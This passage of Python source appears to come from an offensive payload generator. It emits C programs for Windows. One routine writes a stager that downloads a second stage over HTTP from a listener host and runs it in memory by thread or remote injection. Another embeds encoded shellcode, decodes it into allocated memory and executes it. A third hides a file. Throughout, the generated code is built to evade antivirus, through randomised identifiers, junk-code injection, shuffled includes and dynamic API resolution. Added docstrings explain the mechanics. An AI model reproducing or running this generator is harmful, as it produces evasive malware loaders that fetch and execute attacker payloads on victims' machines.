    ) + " HTTP/1.1\\r\\nHost: " + Lhost + ":" + Lport + "\\r\\nConnection: Keep-Alive\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\\r\\n\\r\\n\";\n"
    Ret_code += "send(" + RandSocket + "," + Randbuff + ", strlen( " + Randbuff + " ),0);\n"
    Ret_code += "Sleep(300);\n"

    # Emits the code that sets up the receive buffer named by ModOpt["Buff"];
    # the allocation API and protection flags are chosen inside inject_utils.
    Ret_code += inject_utils.Win_MemLocal(ModOpt)

    # Receive loop: a second pointer walks the buffer, advancing by the
    # recv() return value, and the loop ends when recv() returns <= 0.
    Ret_code += "char * " + Randpointer2 + " = " + Randlpv + ";\n"
    Ret_code += "int " + RandRecv_int + ";\n"
    Ret_code += "do {" + RandRecv_int + " = recv(" + RandSocket + ", " + Randpointer2 + ", 1024, 0);\n"
    Ret_code += "" + Randpointer2 + " += " + RandRecv_int + ";\n"
    Ret_code += "}while ( " + RandRecv_int + " > 0 );\n"

    if ModOpt["DynImport"] == True:

        Ret_code += "closesocket(" + RandSocket + ");" + NdcWSACleanup + "();\n"

    else:
        Ret_code += "closesocket(" + RandSocket + ");WSACleanup();\n"

    # For "RW/..." allocation modes with thread execution a protection
    # change is emitted; the target protection is decided in inject_utils.
    if "RW/" in MemAlloc and ExecMethod == "Thread":

        Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)

    # Move the buffer pointer past the HTTP response headers
    # (first CRLF CRLF plus its four bytes).
    Ret_code += Randlpv + " = strstr(" + Randlpv + ", \"\\r\\n\\r\\n\") + 4;\n"

    if ModOpt["ExecMethod"] == "Thread":

        Ret_code += inject_utils.Win_LocalThread(ModOpt)
    else:
        Ret_code += inject_utils.Win_RemoteInjection(ModOpt)

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    # Post-process the whole text; the meaning of the JI/JF/EF/JR options is
    # defined by JunkInjector and is not visible here.
    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            ModOpt["JR"])

    # Close the entry point opened above.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
def ShellInject_C_windows(ModOpt):
    """Generate the C source of a Windows shellcode runner and write it to Source.c.

    This function only builds text. It concatenates C statements into one
    string, passes that string through JunkInjector and hands the result to
    WriteSource. Nothing is compiled or executed here.

    Two shapes of program are produced, selected by whether
    ModOpt["ExecMethod"] is in the module-level Remote_methods collection:

    * not in Remote_methods: the emitted code declares a pointer, sets up
      memory through inject_utils.Win_MemLocal, copies the embedded buffer
      into it with RtlMoveMemory, appends the decoder stub when there is
      one, optionally changes the memory protection, and finishes with the
      code from inject_utils.Win_LocalThread.
    * in Remote_methods: everything after the buffer definition is
      delegated to inject_utils.Win_RemoteInjection.

    Args:
        ModOpt: option dict. Keys read here: "Payload", "Encode", "Arch",
            "MemAlloc", "ExecMethod", "Outformat", "Reflective" (only when
            "Outformat" is "dll"), "DynImport", "Bufflen", "JI", "JF",
            "EF", "JR". Keys written here: "Buff", "Lpvoid", "Payload",
            "Decoder", and "NtdllHandle"/"Ker32Handle" when "DynImport" is
            true. "Bufflen" is read but not set in this function;
            presumably a helper called earlier in the function sets it --
            confirm against EncryptionManager / inject_utils.ShellcodeHelper.

    Returns:
        None. The generated source is written with WriteSource("Source.c", ...).

    Analyst note: the local variant emits the sequence "set up memory, copy
    a static buffer into it, optionally change protection, start execution"
    inside one process. Which APIs carry each step is decided in
    inject_utils and is not visible here.
    """

    # Fresh identifiers for the emitted C variables. Only Randbufname and
    # Randlpv are referenced again in this function; the others are generated
    # and left unused here.
    Randbufname = varname_creator()
    Randlpv = varname_creator()
    Randhand = varname_creator()
    Randresult = varname_creator()
    Randthread = varname_creator()
    Oldprot = varname_creator()
    Randbool = varname_creator()
    Ndcvirtualpro = varname_creator()
    ResThread = varname_creator()

    Payload = ModOpt["Payload"]
    Encryption = ModOpt["Encode"]
    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]
    # Publish the buffer and pointer names so the inject_utils helpers emit
    # code that refers to the same identifiers.
    ModOpt["Buff"] = Randbufname
    ModOpt["Lpvoid"] = Randlpv
    #ModOpt["Lpvoid2"] = varname_creator()

    #if ModOpt["ExecMethod"] not in Remote_methods or ModOpt["MemAlloc"] in ["SharedSection","SS"]:

    # For local execution the pointer name is passed to EncryptionManager as
    # well; for remote methods only the buffer name is passed.
    if ExecMethod not in Remote_methods: #["EntryPointHijack","EPH","EarlyBird","EB"]:

        DecodeKit = EncryptionManager(Encryption,Payload,Randbufname,Randlpv)
    else:
        DecodeKit = EncryptionManager(Encryption,Payload,Randbufname)        

    ModOpt["Payload"] = DecodeKit[0] # encoded shellcode 
    ModOpt["Decoder"] = DecodeKit[1] # decoder stub or string = False if decoder is not necessary

    Ret_code = ""

    IncludeList = ["#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <math.h>\n","#include <time.h>\n"]

    Ret_code += IncludeShuffler(IncludeList)
    Ret_code += "#include <tlhelp32.h>\n"
    
    # Entry point: main() for an executable, DllMain() gated on
    # DLL_PROCESS_ATTACH for a DLL. Any other "Outformat" emits no entry point.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"
        
        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"

        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    # With DynImport the module handles are stored in ModOpt under generated
    # names; the ntdll handle is used below to resolve RtlMoveMemory.
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    # "$:START", "$:EVA" and "$:END" are marker lines inside the generated
    # text; presumably JunkInjector consumes them -- confirm in that helper.
    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    # Emits the definition of the embedded buffer (details in inject_utils).
    Ret_code += inject_utils.ShellcodeHelper(ModOpt)

    if ModOpt["ExecMethod"] not in Remote_methods:

        Ret_code += "unsigned char * " + Randlpv + ";\n" 
        Ret_code += inject_utils.Win_MemLocal(ModOpt)

        # Copy the embedded buffer into the new region, either through a
        # GetProcAddress-resolved pointer or by calling RtlMoveMemory directly.
        if ModOpt["DynImport"] == True:
        
             Ndcrtlmovemem = varname_creator() 
             Ret_code += "FARPROC " + Ndcrtlmovemem + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"RtlMoveMemory\");\n"
             Ret_code += Ndcrtlmovemem + "(" + Randlpv + "," + Randbufname + "," + ModOpt["Bufflen"] + ");\n"
        else:
             Ret_code += "RtlMoveMemory(" + Randlpv + "," + Randbufname + "," + ModOpt["Bufflen"] + ");\n"

        # "False" as a string means EncryptionManager supplied no decoder stub.
        if ModOpt["Decoder"] != "False":

            Ret_code += ModOpt["Decoder"]

        # For "RW/..." allocation modes a protection change is emitted before
        # execution; the target protection is decided in inject_utils.
        if "RW/" in MemAlloc and ExecMethod in ["Thread","APC"]:

            Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)

        Ret_code += inject_utils.Win_LocalThread(ModOpt)
    else:
        #ModOpt["Lpvoid"] = ModOpt["Buff"]
        Ret_code += inject_utils.Win_RemoteInjection(ModOpt)

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    # Post-process the whole text; the meaning of the JI/JF/EF/JR options is
    # defined by JunkInjector and is not visible here.
    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])

    # Close the entry point opened above.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":
        
        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c",Ret_code)
def Postex_C_SetFileAttributeHidden_windows(ModOpt):
    """Generate C source that marks one file as hidden and write it to Source.c.

    This function only builds text. It concatenates C statements into one
    string, passes that string through JunkInjector and hands the result to
    WriteSource. Nothing is compiled or executed here.

    The functional part of the emitted program is two Win32 calls:
    GetFileAttributes on ModOpt["Binpath"], then SetFileAttributes on the
    same path with FILE_ATTRIBUTE_HIDDEN added to the value read.

    Args:
        ModOpt: option dict. Keys read here: "Outformat", "Reflective"
            (only when "Outformat" is "dll"), "DynImport", "Binpath", "JI",
            "JF", "EF". Keys written here: "NtdllHandle"/"Ker32Handle"
            when "DynImport" is true. "Binpath" is placed verbatim between
            double quotes in the generated C string literal.

    Returns:
        None. The generated source is written with WriteSource("Source.c", ...).

    Analyst note: the target path is a literal in the generated source, so
    it appears as a plain string argument to both calls.
    """

    # RandCounter is generated but not referenced again in this function.
    RandCounter = varname_creator()
    RandAttr = varname_creator()

    Ret_code = ""

    IncludeList = [
        "#include <windows.h>\n", "#include <stdio.h>\n",
        "#include <string.h>\n", "#include <math.h>\n", "#include <time.h>\n"
    ]

    Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"

    # Entry point: main() for an executable, DllMain() gated on
    # DLL_PROCESS_ATTACH for a DLL. Any other "Outformat" emits no entry point.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"

        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    # The module handles are declared for the helpers that receive ModOpt;
    # the two file-attribute calls below are emitted as direct calls.
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    # "$:START", "$:EVA" and "$:END" are marker lines inside the generated
    # text; presumably JunkInjector consumes them -- confirm in that helper.
    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    # Read the current attributes, then write them back with the hidden flag
    # added arithmetically.
    Ret_code += "DWORD " + RandAttr + " = GetFileAttributes(\"" + ModOpt[
        "Binpath"] + "\");\n"
    Ret_code += "SetFileAttributes(\"" + ModOpt[
        "Binpath"] + "\"," + RandAttr + " + FILE_ATTRIBUTE_HIDDEN);\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    # The fifth JunkInjector argument is the constant False here, whereas the
    # other generators in this file pass ModOpt["JR"].
    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            False)

    # Close the entry point opened above.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)